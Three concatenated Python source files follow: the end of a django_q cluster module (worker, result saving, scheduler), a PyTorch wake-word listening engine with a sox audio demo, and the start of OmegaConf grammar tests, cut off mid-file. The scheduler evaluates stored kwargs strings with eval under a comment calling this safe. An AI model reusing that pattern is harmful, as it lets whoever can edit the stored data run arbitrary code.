broker.acknowledge(ack_id) # signal execution done post_execute.send(sender="django_q", task=task) # log the result if task["success"]: # log success logger.info(_(f"Processed [{task['name']}]")) else: # log failure logger.error(_(f"Failed [{task['name']}] - {task['result']}")) logger.info(_(f"{name} stopped monitoring results")) def worker( task_queue: Queue, result_queue: Queue, timer: Value, timeout: int = Conf.TIMEOUT ): """ Takes a task from the task queue, tries to execute it and puts the result back in the result queue :param timeout: number of seconds wait for a worker to finish. :type task_queue: multiprocessing.Queue :type result_queue: multiprocessing.Queue :type timer: multiprocessing.Value """ name = current_process().name logger.info(_(f"{name} ready for work at {current_process().pid}")) task_count = 0 if timeout is None: timeout = -1 # Start reading the task queue for task in iter(task_queue.get, "STOP"): result = None timer.value = -1 # Idle task_count += 1 # Get the function from the task logger.info(_(f'{name} processing [{task["name"]}]')) f = task["func"] # if it's not an instance try to get it from the string if not callable(task["func"]): f = pydoc.locate(f) close_old_django_connections() timer_value = task.pop("timeout", timeout) # signal execution pre_execute.send(sender="django_q", func=f, task=task) # execute the payload timer.value = timer_value # Busy try: res = f(*task["args"], **task["kwargs"]) result = (res, True) except Exception as e: result = (f"{e} : {traceback.format_exc()}", False) if error_reporter: error_reporter.report() if task.get("sync", False): raise with timer.get_lock(): # Process result task["result"] = result[0] task["success"] = result[1] task["stopped"] = timezone.now() result_queue.put(task) timer.value = -1 # Idle # Recycle if task_count == Conf.RECYCLE or rss_check(): timer.value = -2 # Recycled break logger.info(_(f"{name} stopped doing work")) def save_task(task, broker: Broker): """ Saves the task package to Django or the cache :param task: the task package :type broker: brokers.Broker """ # SAVE LIMIT < 0 : Don't save success if not task.get("save", Conf.SAVE_LIMIT >= 0) and task["success"]: return # enqueues next in a chain if task.get("chain", None): django_q.tasks.async_chain( task["chain"], group=task["group"], cached=task["cached"], sync=task["sync"], broker=broker, ) # SAVE LIMIT > 0: Prune database, SAVE_LIMIT 0: No pruning close_old_django_connections() try: database_to_use = {"using": Conf.SCHEDULER_BD} if Conf.SCHEDULER_BD else {} with db.transaction.atomic(**database_to_use): last = Success.objects.select_for_update().last() if task["success"] and 0 < Conf.SAVE_LIMIT <= Success.objects.count(): last.delete() # check if this task has previous results if Task.objects.filter(id=task["id"], name=task["name"]).exists(): existing_task = Task.objects.get(id=task["id"], name=task["name"]) # only update the result if it hasn't succeeded yet if not existing_task.success: existing_task.stopped = task["stopped"] existing_task.result = task["result"] existing_task.success = task["success"] existing_task.attempt_count = existing_task.attempt_count + 1 existing_task.save() if ( Conf.MAX_ATTEMPTS > 0 and existing_task.attempt_count >= Conf.MAX_ATTEMPTS ): broker.acknowledge(task["ack_id"]) else: func = task["func"] # convert func to string if inspect.isfunction(func): func = f"{func.__module__}.{func.__name__}" elif inspect.ismethod(func): func = ( f"{func.__self__.__module__}." f"{func.__self__.__name__}.{func.__name__}" ) Task.objects.create( id=task["id"], name=task["name"], func=func, hook=task.get("hook"), args=task["args"], kwargs=task["kwargs"], started=task["started"], stopped=task["stopped"], result=task["result"], group=task.get("group"), success=task["success"], attempt_count=1, ) except Exception as e: logger.error(e) def save_cached(task, broker: Broker): task_key = f'{broker.list_key}:{task["id"]}' timeout = task["cached"] if timeout is True: timeout = None try: group = task.get("group", None) iter_count = task.get("iter_count", 0) # if it's a group append to the group list if group: group_key = f"{broker.list_key}:{group}:keys" group_list = broker.cache.get(group_key) or [] # if it's an iter group, check if we are ready if iter_count and len(group_list) == iter_count - 1: group_args = f"{broker.list_key}:{group}:args" # collate the results into a Task result results = [ SignedPackage.loads(broker.cache.get(k))["result"] for k in group_list ] results.append(task["result"]) task["result"] = results task["id"] = group task["args"] = SignedPackage.loads(broker.cache.get(group_args)) task.pop("iter_count", None) task.pop("group", None) if task.get("iter_cached", None): task["cached"] = task.pop("iter_cached", None) save_cached(task, broker=broker) else: save_task(task, broker) broker.cache.delete_many(group_list) broker.cache.delete_many([group_key, group_args]) return # save the group list group_list.append(task_key) broker.cache.set(group_key, group_list, timeout) # async_task next in a chain if task.get("chain", None): django_q.tasks.async_chain( task["chain"], group=group, cached=task["cached"], sync=task["sync"], broker=broker, ) # save the task broker.cache.set(task_key, SignedPackage.dumps(task), timeout) except Exception as e: logger.error(e) def scheduler(broker: Broker = None): """ Creates a task from a schedule at the scheduled time and schedules next run """ if not broker: broker = get_broker() close_old_django_connections() try: database_to_use = {"using": Conf.SCHEDULER_BD} if Conf.SCHEDULER_BD else {} with db.transaction.atomic(**database_to_use): for s in ( Schedule.objects.select_for_update() .exclude(repeats=0) .filter(next_run__lt=timezone.now()) .filter( db.models.Q(cluster__isnull=True) | db.models.Q(cluster=Conf.PREFIX) ) ): args = () kwargs = {} # get args, kwargs and hook if s.kwargs: try: # eval should be safe here because dict() kwargs = eval(f"dict({s.kwargs})") except SyntaxError: kwargs = {} if s.args: args = ast.literal_eval(s.args) # single value won't eval to tuple, so: if type(args) != tuple: args = (args,) q_options = kwargs.get("q_options", {}) if s.hook: q_options["hook"] = s.hook # set up the next run time if s.schedule_type != s.ONCE: next_run = arrow.get(s.next_run) while True: if s.schedule_type == s.MINUTES: next_run = next_run.shift(minutes=+(s.minutes or 1)) elif s.schedule_type == s.HOURLY: next_run = next_run.shift(hours=+1) elif s.schedule_type == s.DAILY: next_run = next_run.shift(days=+1) elif s.schedule_type == s.WEEKLY: next_run = next_run.shift(weeks=+1) elif s.schedule_type == s.MONTHLY: next_run = next_run.shift(months=+1) elif s.schedule_type == s.QUARTERLY: next_run = next_run.shift(months=+3) elif s.schedule_type == s.YEARLY: next_run = next_run.shift(years=+1) elif s.schedule_type == s.CRON: if not croniter: raise ImportError( _( "Please install croniter to enable cron expressions" ) ) next_run = arrow.get( croniter(s.cron, localtime()).get_next() ) if Conf.CATCH_UP or next_run > arrow.utcnow(): break # arrow always returns a tz aware datetime, and we don't want # this when we explicitly configured django with USE_TZ=False s.next_run = ( next_run.datetime if settings.USE_TZ else next_run.datetime.replace(tzinfo=None) ) s.repeats += -1 # send it to the cluster scheduled_broker = broker try: scheduled_broker = get_broker(q_options["broker_name"]) except: # invalid broker_name or non existing broker with broker_name pass q_options["broker"] = scheduled_broker q_options["group"] = q_options.get("group", s.name or s.id) kwargs["q_options"] = q_options s.task = django_q.tasks.async_task(s.func, *args, **kwargs) # log it if not s.task: logger.error( _( f"{current_process().name} failed to create a task from schedule [{s.name or s.id}]" ) ) else: logger.info( _( f"{current_process().name} created a task from schedule [{s.name or s.id}]" ) ) # default behavior is to delete a ONCE schedule if s.schedule_type == s.ONCE: if s.repeats < 0: s.delete() continue # but not if it has a positive repeats s.repeats = 0 # save the schedule s.save() except Exception as e: logger.error(e) def close_old_django_connections(): """ Close django connections unless running with sync=True. """ if Conf.SYNC: logger.warning( "Preserving django database connections because sync=True. Beware " "that tasks are now injected in the calling context/transactions " "which may result in unexpected bahaviour." ) else: db.close_old_connections() def set_cpu_affinity(n: int, process_ids: list, actual: bool = not Conf.TESTING): """ Sets the cpu affinity for the supplied processes. Requires the optional psutil module. :param int n: affinity :param list process_ids: a list of pids :param bool actual: Test workaround for Travis not supporting cpu affinity """ # check if we have the psutil module if not psutil: logger.warning("Skipping cpu affinity because psutil was not found.") return # check if the platform supports cpu_affinity if actual and not hasattr(psutil.Process(process_ids[0]), "cpu_affinity"): logger.warning( "Faking cpu affinity because it is not supported on this platform" ) actual = False # get the available processors cpu_list = list(range(psutil.cpu_count())) # affinities of 0 or gte cpu_count, equals to no affinity if not n or n >= len(cpu_list): return # spread the workers over the available processors. index = 0 for pid in process_ids: affinity = [] for k in range(n): if index == len(cpu_list): index = 0 affinity.append(cpu_list[index]) index += 1 if psutil.pid_exists(pid): p = psutil.Process(pid) if actual: p.cpu_affinity(affinity) logger.info(_(f"{pid} will use cpu {affinity}")) def rss_check(): if Conf.MAX_RSS: if resource: return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss >= Conf.MAX_RSS elif psutil: return psutil.Process().memory_info().rss >= Conf.MAX_RSS * 1024 return False def localtime() -> datetime: """Override for timezone.localtime to deal with naive times and local times""" if settings.USE_TZ: return timezone.localtime() return datetime.now()
engine.py
"""the interface to interact with wakeword model""" import pyaudio import threading import time import argparse import wave import torchaudio import torch import numpy as np from neuralnet.dataset import get_featurizer from threading import Event class Listener: def __init__(self, sample_rate=8000, record_seconds=2): self.chunk = 1024 self.sample_rate = sample_rate self.record_seconds = record_seconds self.p = pyaudio.PyAudio() self.stream = self.p.open(format=pyaudio.paInt16, channels=1, rate=self.sample_rate, input=True, output=True, frames_per_buffer=self.chunk) def listen(self, queue): while True: data = self.stream.read(self.chunk , exception_on_overflow=False) queue.append(data) time.sleep(0.01) def run(self, queue): thread = threading.Thread(target=self.listen, args=(queue,), daemon=True) thread.start() print("\nWake Word Engine is now listening... \n") class WakeWordEngine: def __init__(self, model_file): self.listener = Listener(sample_rate=8000, record_seconds=2) self.model = torch.jit.load(model_file) self.model.eval().to('cpu') #run on cpu self.featurizer = get_featurizer(sample_rate=8000) self.audio_q = list() def save(self, waveforms, fname="wakeword_temp"): wf = wave.open(fname, "wb") # set the channels wf.setnchannels(1) # set the sample format wf.setsampwidth(self.listener.p.get_sample_size(pyaudio.paInt16)) # set the sample rate wf.setframerate(8000) # write the frames as bytes wf.writeframes(b"".join(waveforms)) # close the file wf.close() return fname def predict(self, audio): with torch.no_grad(): fname = self.save(audio) waveform, _ = torchaudio.load(fname, normalization=False) # don't normalize on train mfcc = self.featurizer(waveform).transpose(1, 2).transpose(0, 1) # TODO: read from buffer instead of saving and loading file # waveform = torch.Tensor([np.frombuffer(a, dtype=np.int16) for a in audio]).flatten() # mfcc = self.featurizer(waveform).transpose(0, 1).unsqueeze(1) out = self.model(mfcc) pred = torch.round(torch.sigmoid(out)) return pred.item() def inference_loop(self, action): while True: if len(self.audio_q) > 15: # remove part of stream diff = len(self.audio_q) - 15 for _ in range(diff): self.audio_q.pop(0) action(self.predict(self.audio_q)) elif len(self.audio_q) == 15: action(self.predict(self.audio_q)) time.sleep(0.05) def run(self, action): self.listener.run(self.audio_q) thread = threading.Thread(target=self.inference_loop, args=(action,), daemon=True) thread.start() class DemoAction: """This demo action will just randomly say Arnold Schwarzenegger quotes args: sensitivty. the lower the number the more sensitive the wakeword is to activation. """ def __init__(self, sensitivity=10): # import stuff here to prevent engine.py from # importing unecessary modules during production usage import os import subprocess import random from os.path import join, realpath self.random = random self.subprocess = subprocess self.detect_in_row = 0 self.sensitivity = sensitivity folder = realpath(join(realpath(__file__), '..', '..', '..', 'fun', 'arnold_audio')) self.arnold_mp3 = [ os.path.join(folder, x) for x in os.listdir(folder) if ".wav" in x ] def __call__(self, prediction): if prediction == 1: self.detect_in_row += 1 if self.detect_in_row == self.sensitivity: self.play() self.detect_in_row = 0 else: self.detect_in_row = 0 def play(self): filename = self.random.choice(self.arnold_mp3) try: print("playing", filename) self.subprocess.check_output(['play', '-v', '.1', filename]) except Exception as e: print(str(e)) if __name__ == "__main__": parser = argparse.ArgumentParser(description="demoing the wakeword engine") parser.add_argument('--model_file', type=str, default=None, required=True, help='optimized file to load. use optimize_graph.py') parser.add_argument('--sensitivty', type=int, default=10, required=False, help='lower value is more sensitive to activations') args = parser.parse_args() wakeword_engine = WakeWordEngine(args.model_file) action = DemoAction(sensitivity=10) print("""\n*** Make sure you have sox installed on your system for the demo to work!!! If you don't want to use sox, change the play function in the DemoAction class in engine.py module to something that works with your system.\n """) # action = lambda x: print(x) wakeword_engine.run(action) threading.Event().wait()
test_grammar.py
import math import re import threading import time from typing import Any, Callable, List, Optional, Set, Tuple import antlr4 from pytest import mark, param, raises, warns from omegaconf import ( AnyNode, Container, DictConfig, ListConfig, OmegaConf, _utils, grammar_parser, grammar_visitor, ) from omegaconf._utils import nullcontext from omegaconf.errors import ( GrammarParseError, InterpolationKeyError, InterpolationResolutionError, UnsupportedInterpolationType, ) TAB = "\t" # to be used in raw strings, e.g. `fr"C:\{TAB}foo"` # Characters that are not allowed by the grammar in config key names. INVALID_CHARS_IN_KEY_NAMES = r"""\{}()[].:"' """ UNQUOTED_SPECIAL = r"/-\+.$%*@?|" # special characters allowed in unquoted strings # A fixed config that may be used (but not modified!) by tests. BASE_TEST_CFG = OmegaConf.create( { # Standard data types. "str": "hi", "int": 123, "float": 1.2, "bytes": b"binary", "dict": {"a": 0, "b": {"c": 1}}, "list": [x - 1 for x in range(11)], "null": None, # Special cases. "x@y": 123, # @ in name "$x$y$z$": 456, # $ in name (beginning, middle and end) "0": 0, # integer name "FalsE": {"TruE": True}, # bool name "None": {"null": 1}, # null-like name "1": {"2": 12}, # dot-path with int keys # Used in nested interpolations. "str_test": "test", "ref_str": "str", "options": {"a": "A", "b": "B"}, "choice": "a", "rel_opt": ".options", } ) # Parameters for tests of the "singleElement" rule when there is no interpolation. # Each item is a tuple with three elements: # - The id of the test. # - The expression to be evaluated. # - The expected result, that may be an exception. If it is a `GrammarParseError` then # it is assumed that the parsing will fail. If it is another kind of exception then # it is assumed that the parsing will succeed, but this exception will be raised when # visiting (= evaluating) the parse tree. If the expected behavior is for the parsing # to succeed, but a `GrammarParseError` to be raised when visiting it, then set the # expected result to the pair `(None, GrammarParseError)`. PARAMS_SINGLE_ELEMENT_NO_INTERPOLATION: List[Tuple[str, str, Any]] = [ # Special keywords. ("null", "null", None), ("true", "TrUe", True), ("false", "falsE", False), ("true_false", "true_false", "true_false"), # Integers. ("int", "123", 123), ("int_pos", "+123", 123), ("int_neg", "-123", -123), ("int_underscore", "1_000", 1000), ("int_bad_underscore_1", "1_000_", "1_000_"), ("int_bad_underscore_2", "1__000", "1__000"), ("int_bad_underscore_3", "_1000", "_1000"), ("int_bad_zero_start", "007", "007"), # Floats. ("float", "1.1", 1.1), ("float_no_int", ".1", 0.1), ("float_no_decimal", "1.", 1.0), ("float_minus", "-.2", -0.2), ("float_underscore", "1.1_1", 1.11), ("float_bad_1", "1.+2", "1.+2"), ("float_bad_2", r"1\.2", r"1\.2"), ("float_bad_3", "1.2_", "1.2_"), ("float_exp_1", "-1e2", -100.0), ("float_exp_2", "+1E-2", 0.01), ("float_exp_3", "1_0e1_0", 10e10), ("float_exp_4", "1.07e+2", 107.0), ("float_exp_5", "1e+03", 1000.0), ("float_exp_bad_1", "e-2", "e-2"), ("float_exp_bad_2", "01e2", "01e2"), ("float_inf", "inf", math.inf), ("float_plus_inf", "+inf", math.inf), ("float_minus_inf", "-inf", -math.inf), ("float_nan", "nan", math.nan), ("float_plus_nan", "+nan", math.nan), ("float_minus_nan", "-nan", math.nan), # Unquoted strings. # Note: raw strings do not allow trailing \, adding a space and stripping it. ( "str_legal", (r" a" + UNQUOTED_SPECIAL + r"\\ ").strip(), (r" a" + UNQUOTED_SPECIAL + r"\ ").strip(), ), ("str_illegal_1", "a,=b", GrammarParseError), ("str_illegal_2", f"{chr(200)}", GrammarParseError), ("str_illegal_3", f"{chr(129299)}", GrammarParseError), ("str_dot", ".", "."), ("str_dollar", "$", "$"), ("str_colon", ":", ":"), ("str_ws_1", "hello world", "hello world"), ("str_ws_2", "a b\tc \t\t d", "a b\tc \t\t d"), ("str_esc_ws_1", r"\ hello\ world\ ", " hello world "), ("str_esc_ws_2", rf"\ \{TAB}\{TAB}", f" {TAB}{TAB}"), ("str_esc_comma", r"hello\, world", "hello, world"), ("str_esc_colon", r"a\:b", "a:b"), ("str_esc_equal", r"a\=b", "a=b"), ("str_esc_parentheses", r"\(foo\)", "(foo)"), ("str_esc_brackets", r"\[foo\]", "[foo]"), ("str_esc_braces", r"\{foo\}", "{foo}"), ("str_esc_backslash", r" \ ".strip(), r" \ ".strip()), ("str_backslash_noesc", r"ab\cd", r"ab\cd"), ("str_esc_illegal_1", r"\#", GrammarParseError), ("str_esc_illegal_2", r""" \'\" """.strip(), GrammarParseError), # Quoted strings. ("str_quoted_single", "'!@#$%^&*|()[]:.,\"'", '!@#$%^&*|()[]:.,"'), ("str_quoted_double", '"!@#$%^&*|()[]:.,\'"', "!@#$%^&*|()[]:.,'"), ("str_quoted_outer_ws_single", "' a \t'", " a \t"), ("str_quoted_outer_ws_double", '" a \t"', " a \t"), ("str_quoted_int", "'123'", "123"), ("str_quoted_null", "'null'", "null"), ("str_quoted_bool", "['truE', \"FalSe\"]", ["truE", "FalSe"]), ("str_quoted_list", "'[a,b, c]'", "[a,b, c]"), ("str_quoted_dict", '"{a:b, c: d}"', "{a:b, c: d}"), ("str_quoted_backslash_noesc_single", r"'a\b'", r"a\b"), ("str_quoted_backslash_noesc_double", r'"a\b"', r"a\b"), ("str_quoted_concat_bad_2", "'Hi''there'", GrammarParseError), ("str_quoted_too_many_1", "''a'", GrammarParseError), ("str_quoted_too_many_2", "'a''", GrammarParseError), ("str_quoted_too_many_3", "''a''", GrammarParseError), ("str_quoted_trailing_esc_1", r"'abc\\'", r" abc\ ".strip()), ("str_quoted_trailing_esc_2", r"'abc\\\\'", r" abc\\ ".strip()), ("str_quoted_no_esc_single_1", r"'abc\def'", r"abc\def"), ("str_quoted_no_esc_single_2", r"'abc\\def'", r"abc\\def"), ("str_quoted_no_esc_single_3", r"'\\\abc\def'", r"\\\abc\def"), ("str_quoted_no_esc_dollar_single", r"'abc\\$$'", r"abc\\$$"), ("str_quoted_no_esc_double_1", r'"abc\def"', r"abc\def"), ("str_quoted_no_esc_double_2", r'"abc\\def"', r"abc\\def"), ("str_quoted_no_esc_double_3", r'"\\\abc\def"', r"\\\abc\def"), ("str_quoted_no_esc_dollar_double", r'"abc\\$$"', r"abc\\$$"), ("str_quoted_bad_1", r'"abc\"', GrammarParseError), ("str_quoted_bad_2", r'"abc\\\"', GrammarParseError), ("str_quoted_esc_quote_single_1", r"'abc\'def'", "abc'def"), ("str_quoted_esc_quote_single_2", r"'abc\\\'def'", r"abc\'def"), ("str_quoted_esc_quote_single_3", r"'abc\\\\\'def'", r"abc\\'def"), ("str_quoted_esc_quote_single_4", r"'a\'b\'cdef\\\''", r"a'b'cdef\'"), ("str_quoted_esc_quote_single_bad", r"'abc\\'def'", GrammarParseError), ("str_quoted_esc_quote_double_1", r'"abc\"def"', 'abc"def'), ("str_quoted_esc_quote_double_2", r'"abc\\\"def"', r"abc\"def"), ("str_quoted_esc_quote_double_3", r'"abc\\\\\"def"', r'abc\\"def'), ("str_quoted_esc_quote_double_4", r'"a\"b\"cdef\\\""', r'a"b"cdef\"'), ("str_quoted_esc_quote_double_bad", r'"abc\\"def"', GrammarParseError), ("str_quoted_empty", "''", ""), ("str_quoted_basic", "'a'", "a"), ("str_quoted_tmp_1", r"'\a'", r"\a"), ("str_quoted_tmp_2", r"'a\'", GrammarParseError), ("str_quoted_inside_quote_different", "'\"'", '"'), ("str_quoted_inside_quote_same", r"'\''", "'"), ("str_quoted_extra_quote", r"'c:\\''", GrammarParseError), # Lists and dictionaries. ("list", "[0, 1]", [0, 1]), ( "dict", "{x: 1, a: b, y: 1e2, null2: 0.1, true3: false, inf4: true}", {"x": 1, "a": "b", "y": 100.0, "null2": 0.1, "true3": False, "inf4": True}, ), ( "dict_unquoted_key", rf"{{a0-null-1-3.14-NaN- {TAB}-true-False-{UNQUOTED_SPECIAL}\(\)\[\]\{{\}}\:\=\ \{TAB}\,:0}}", { rf"a0-null-1-3.14-NaN- {TAB}-true-False-{UNQUOTED_SPECIAL}()[]{{}}:= {TAB},": 0 }, ), ( "dict_quoted", "{0: 1, 'a': 'b', 1.1: 1e2, null: 0.1, true: false, -inf: true}", GrammarParseError, ), ( "structured_mixed", "[10,str,3.14,true,false,inf,[1,2,3], 'quoted', \"quoted\", 'a,b,c']", [ 10, "str", 3.14, True, False, math.inf, [1, 2, 3], "quoted", "quoted", "a,b,c", ], ), ("dict_int_key", "{0: 0}", {0: 0}), ("dict_float_key", "{1.1: 0}", {1.1: 0}), ("dict_null_key", "{null: 0}", {None: 0}), ("dict_nan_like_key", "{'nan': 0}", GrammarParseError), ("dict_list_as_key", "{[0]: 1}", GrammarParseError), ( "dict_bool_key", "{true: true, false: 'false'}", {True: True, False: "false"}, ), ("empty_dict", "{}", {}), ("empty_list", "[]", []), ( "structured_deep", "{null0: [0, 3.14, false], true1: {a: [0, 1, 2], b: {}}}", {"null0": [0, 3.14, False], "true1": {"a": [0, 1, 2], "b": {}}}, ), ] # Parameters for tests of the "singleElement" rule when there are interpolations. PARAMS_SINGLE_ELEMENT_WITH_INTERPOLATION = [ # Node interpolations. ("dict_access", "${dict.a}", 0), ("list_access", "${list.0}", -1), ("dict_access_getitem", "${dict[a]}", 0), ("list_access_getitem", "${list[0]}", -1), ("getitem_first_1", "${[dict].a}", 0), ("getitem_first_2", "${[list][0]}", -1), ("dict_access_deep_1", "${dict.b.c}", 1), ("dict_access_deep_2", "${dict[b].c}", 1), ("dict_access_deep_3", "${dict.b[c]}", 1), ("dict_access_deep_4", "${dict[b][c]}", 1), ("list_access_underscore", "${list.1_0}", 9), ("list_access_bad_negative", "${list.-1}", InterpolationKeyError), ("dict_access_list_like_1", "${0}", 0), ("dict_access_list_like_2", "${1.2}", 12), ("bool_like_keys", "${FalsE.TruE}", True), ("null_like_key_ok", "${None.null}", 1), ("null_like_key_bad_case", "${NoNe.null}", InterpolationKeyError), ("null_like_key_quoted_1", "${'None'.'null'}", GrammarParseError), ("null_like_key_quoted_2", "${'None.null'}", GrammarParseError), ("dotpath_bad_type", "${dict.${float}}", (None, InterpolationResolutionError)), ("at_in_key", "${x@y}", 123), ("dollar_in_key", "${$x$y$z$}", 456), # Interpolations in dictionaries. ("dict_interpolation_value", "{hi: ${str}, int: ${int}}", {"hi": "hi", "int": 123}), ("dict_interpolation_key", "{${str}: 0, ${null}: 1", GrammarParseError), # Interpolations in lists. ("list_interpolation", "[${str}, ${int}]", ["hi", 123]), # Interpolations in unquoted strings. ("str_dollar_and_inter", "$$${str}", "$$hi"), ("str_inter", "hi_${str}", "hi_hi"), ("str_esc_illegal_3", r"\${foo\}", GrammarParseError), # Interpolations in quoted strings. ("str_quoted_inter", "'${null}'", "None"), ("str_quoted_esc_single_1", r"'ab\'cd\'\'${str}'", "ab'cd''hi"), ("str_quoted_esc_single_2", r"""'\\\${foo}'""", r"\${foo}"), ("str_quoted_esc_single_3", r"""'\\a_${str}'""", r"\\a_hi"), ("str_quoted_esc_single_4", r"""'a_${str}\\'""", r" a_hi\ ".strip()), ("str_quoted_esc_double_1", r'"ab\"cd\"\"${str}"', 'ab"cd""hi'), ("str_quoted_esc_double_2", r'''"\\\${foo}"''', r"\${foo}"), ("str_quoted_esc_double_3", r'''"\\a_${str}"''', r"\\a_hi"), ("str_quoted_esc_double_4", r'''"a_${str}\\"''', r" a_hi\ ".strip()), ("str_quoted_other_quote_double", """'double"'""", 'double"'), ("str_quoted_other_quote_single", '''"single'"''', "single'"), ("str_quoted_concat_bad_1", '"Hi "${str}', GrammarParseError), ("str_quoted_nested", "'${test:\"b\"}'", "b"), ("str_quoted_nested_esc_quotes", "'${test:'b'}'", "b"), ("str_quoted_esc_inter", r"""'\${test:"b"}'""", '${test:"b"}'), ("str_quoted_esc_inter_and_quotes", r"'\${test:\'b\'}'", "${test:'b'}"), ("str_quoted_esc_inter_nested_single_1", r"""'${test:'\${str}'}'""", "${str}"), ("str_quoted_esc_inter_nested_single_2", r"""'${test:'\\${str}'}'""", r"\hi"), ("str_quoted_esc_inter_nested_single_3", r"""'${test:'\\\${str}'}'""", r"\${str}"), ("str_quoted_esc_inter_nested_double_1", r'''"${test:"\${str}"}"''', "${str}"), ("str_quoted_esc_inter_nested_double_2", r'''"${test:"\\${str}"}"''', r"\hi"), ("str_quoted_esc_inter_nested_double_3", r'''"${test:"\\\${str}"}"''', r"\${str}"), ("str_quoted_error_inside_quotes", "'${missing_brace'", GrammarParseError), # Whitespaces. ("ws_inter_node_outer", "${ \tdict.a \t}", 0), ("ws_inter_node_around_dot", "${dict .\ta}", GrammarParseError), ("ws_inter_node_inside_id", "${d i c t.a}", GrammarParseError), ("ws_inter_res_outer", "${\t test:foo\t }", "foo"), ("ws_inter_res_around_colon", "${test\t : \tfoo}", "foo"), ("ws_inter_res_inside_id", "${te st:foo}", GrammarParseError), ("ws_inter_res_inside_args", "${test:f o o}", "f o o"), ("ws_inter_res_namespace", "${ns1 .\t ns2 . test:0}", GrammarParseError), ("ws_inter_res_no_args", "${test: \t}", []), ("ws_list", "${test:[\t a, b, ''\t ]}", ["a", "b", ""]), ("ws_dict", "${test:{\t a : 1\t , b: \t''}}", {"a": 1, "b": ""}), ("ws_quoted_single", "${test: \t'foo'\t }", "foo"), ("ws_quoted_double", '${test: \t"foo"\t }', "foo"), # Nested interpolations. ("nested_simple", "${${ref_str}}", "hi"), ("nested_select", "${options.${choice}}", "A"), ("nested_select_getitem", "${options[${choice}]}", "A"), ("nested_relative", "${${rel_opt}.b}", "B"), ("str_quoted_nested_deep_single", r"'AB${test:'CD${test:'EF'}GH'}'", "ABCDEFGH"), ("str_quoted_nested_deep_double", r'"AB${test:"CD${test:"EF"}GH"}"', "ABCDEFGH"), ("str_quoted_nested_deep_mixed", r'''"AB${test:'CD${test:"EF"}GH'}"''', "ABCDEFGH"), ( "str_quoted_issue_615", r'${test:"The root drive is: \\${str}:\\"}', r" The root drive is: \hi:\ ".strip(), ), # Resolver interpolations. ("no_args", "${test:}", []), ("space_in_args", "${test:a, b c}", ["a", "b c"]), ("list_as_input", "${test:[a, b], 0, [1.1]}", [["a", "b"], 0, [1.1]]), ("dict_as_input", "${test:{a: 1.1, b: b}}", {"a": 1.1, "b": "b"}), ("dict_as_input_quotes", "${test:{'a': 1.1, b: b}}", GrammarParseError), ("dict_typo_colons", "${test:{a: 1.1, b:: b}}", {"a": 1.1, "b": ": b"}), ("missing_resolver", "${MiSsInG_ReSoLvEr:0}", UnsupportedInterpolationType), ("at_in_resolver", "${y@z:}", GrammarParseError), ("ns_resolver", "${ns1.ns2.test:123}", 123), # Nested resolvers. ("nested_resolver", "${${str_test}:a, b, c}", ["a", "b", "c"]), ("nested_deep", "${test:${${test:${ref_str}}}}", "hi"), ( "nested_resolver_combined_illegal", "${some_${resolver}:a, b, c}", GrammarParseError, ), ("nested_args", "${test:${str}, ${null}, ${int}}", ["hi", None, 123]), # Invalid resolver names. ("int_resolver_quoted", "${'0':1,2,3}", GrammarParseError), ("int_resolver_noquote", "${0:1,2,3}", GrammarParseError), ("float_resolver_quoted", "${'1.1':1,2,3}", GrammarParseError), ("float_resolver_noquote", "${1.1:1,2,3}", GrammarParseError), ("float_resolver_exp", "${1e1:1,2,3}", GrammarParseError), ("inter_float_resolver", "${${float}:1,2,3}", (None, InterpolationResolutionError)), # NaN as dictionary key (a resolver is used here to output only the key). ("dict_nan_key_1", "${first:{nan: 0}}", math.nan), ("dict_nan_key_2", "${first:{${test:nan}: 0}}", GrammarParseError), ] # Parameters for tests of the "configValue" rule (may contain interpolations). PARAMS_CONFIG_VALUE = [ # String interpolations (top-level). ("str_top_basic", "bonjour ${str}", "bonjour hi"), ("str_top_quotes_single_1", "'bonjour ${str}'", "'bonjour hi'"), ( "str_top_quotes_single_2", "'Bonjour ${str}', I said.", "'Bonjour hi', I said.", ), ("str_top_quotes_double_1", '"bonjour ${str}"', '"bonjour hi"'), ( "str_top_quotes_double_2", '"Bonjour ${str}", I said.', '"Bonjour hi", I said.', ), ("str_top_missing_end_quote_single", "'${str}", "'hi"), ("str_top_missing_end_quote_double", '"${str}', '"hi'), ("str_top_missing_start_quote_double", '${str}"', 'hi"'), ("str_top_missing_start_quote_single", "${str}'", "hi'"), ("str_top_middle_quote_single", "I'd like ${str}", "I'd like hi"), ("str_top_middle_quote_double", 'I"d like ${str}', 'I"d like hi'), ("str_top_middle_quotes_single", "I like '${str}'", "I like 'hi'"), ("str_top_middle_quotes_double", 'I like "${str}"', 'I like "hi"'), ( "str_top_any_char", r"${str} " + UNQUOTED_SPECIAL + r"^!#&})][({,;", r"hi " + UNQUOTED_SPECIAL + r"^!#&})][({,;", ), ("str_top_esc_inter", r"Esc: \${str}", "Esc: ${str}"), ("str_top_esc_inter_wrong_1", r"Wrong: $\{str\}", r"Wrong: $\{str\}"), ("str_top_esc_inter_wrong_2", r"Wrong: \${str\}", r"Wrong: ${str\}"), ("str_top_esc_backslash_1", r"Esc: \\${str}", r"Esc: \hi"), ("str_top_esc_backslash_2", r"Esc: \\\\${str}", r"Esc: \\hi"), ("str_top_quoted_braces_wrong", r"Wrong: \{${str}\}", r"Wrong: \{hi\}"), ("str_top_leading_dollars", r"$$${str}", "$$hi"), ("str_top_trailing_dollars", r"${str}$$$$", "hi$$$$"), ("str_top_leading_escapes_1", r"\\\\\${str}", r"\\${str}"), ("str_top_leading_escapes_2", r"\\\\ \${str}", r"\\\\ ${str}"), ("str_top_middle_escapes_1", r"abc\\\\\${str}", r"abc\\${str}"), ("str_top_middle_escapes_2", r"abc\\\\ \${str}", r"abc\\\\ ${str}"), ("str_top_trailing_escapes", r" ${str}\\\ ".strip(), r" hi\\\ ".strip()), ("str_top_concat_interpolations", "${null}${float}", "None1.2"), ("str_top_issue_617", r""" ${test: "hi\\" }"} """, r" hi\"} "), # Whitespaces. ("ws_toplevel", " \tab ${str} cd ${int}\t", " \tab hi cd 123\t"), # Unmatched braces. ("missing_brace_1", "${test:${str}", GrammarParseError), ("missing_brace_2", "${${test:str}", GrammarParseError), ("extra_brace", "${str}}", "hi}"), ] def parametrize_from( data: List[Tuple[str, str, Any]] ) -> Callable[[Callable[..., Any]], Callable[..., Any]]: """Utility function to create PyTest parameters from the lists above""" return mark.parametrize( ["definition", "expected"], [param(definition, expected, id=key) for key, definition, expected in data], ) class TestOmegaConfGrammar: """ Test most grammar constructs. Each method in this class tests the validity of expressions in a specific setting. For instance, `test_single_element_no_interpolation()` tests the "singleElement" parsing rule on 